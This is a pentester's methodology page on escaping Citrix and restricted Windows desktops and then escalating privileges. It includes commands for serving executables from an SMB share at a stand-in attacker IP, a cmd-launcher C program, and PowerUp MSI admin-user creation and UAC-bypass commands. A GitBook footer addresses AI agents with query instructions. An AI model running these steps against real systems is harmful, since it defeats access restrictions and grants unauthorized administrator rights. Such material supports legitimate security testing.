> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/windows-priv-esc/citrix-breakout.md). # Citrix / Restricted Desktop Breakout ## Basic Methodology 1. Gain access to a **Dialog Box** 2. Exploit the Dialog Box for **command execution** 3. **Escalate privileges** to gain higher access ## Bypassing Path Restrictions via Dialog Boxes * Many desktop apps have File > Open, Save As, Import, Export, Help, Print that open Windows dialog boxes * These dialog boxes can browse the filesystem even when File Explorer is restricted * Use **Paint**, **Notepad**, **Wordpad**, etc. ### Using Paint to Browse Restricted Paths 1. Open Paint from Start Menu 2. File > Open 3. In the File Name field, enter UNC path: `\\127.0.0.1\c$\users\username` 4. Set File Type to "All Files" 5. Press Enter to browse the directory ## Accessing SMB Shares from Restricted Environment ```bash # On attack machine smbserver.py -smb2support share $(pwd) ``` * In Dialog Box, enter: `\\ATTACKER_IP\share` * Right-click executables and select "Open" to run them ### pwn.exe (Simple CMD Launcher) ```c #include int main() { system("C:\\Windows\\System32\\cmd.exe"); } ``` ## Alternate File Explorers * **Explorer++** (portable, recommended): * **Q-Dir**: alternative file manager * These bypass folder restrictions set by Group Policy ## Alternate Registry Editors * **SmallRegistryEditor**: * **Simpleregedit**: * **Uberregedit**: * Bypass Group Policy blocking of regedit.exe ## Script Execution * Create `evil.bat` containing `cmd` * Execute it to spawn a Command Prompt * Works when .bat/.vbs/.ps extensions auto-execute with their interpreters ## Modifying Existing Shortcuts 1. Right-click shortcut > Properties 2. Change Target field to `C:\Windows\System32\cmd.exe` 3. Execute the shortcut to spawn cmd ## Privilege Escalation After Breakout ### Check AlwaysInstallElevated ```cmd reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated ``` * If both are set to 1, can create MSI to add admin user ### Using PowerUp ```powershell Import-Module .\PowerUp.ps1 Write-UserAddMSI ``` * Creates UserAdd.msi that can add a local admin ### UAC Bypass ```powershell Import-Module .\Bypass-UAC.ps1 Bypass-UAC -Method UacMethodSysprep ``` ## Resources * [Breaking out of Citrix](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/) * [Breaking out of Windows Environments](https://node-security.com/posts/breaking-out-of-windows-environments/) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/windows-priv-esc/citrix-breakout.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.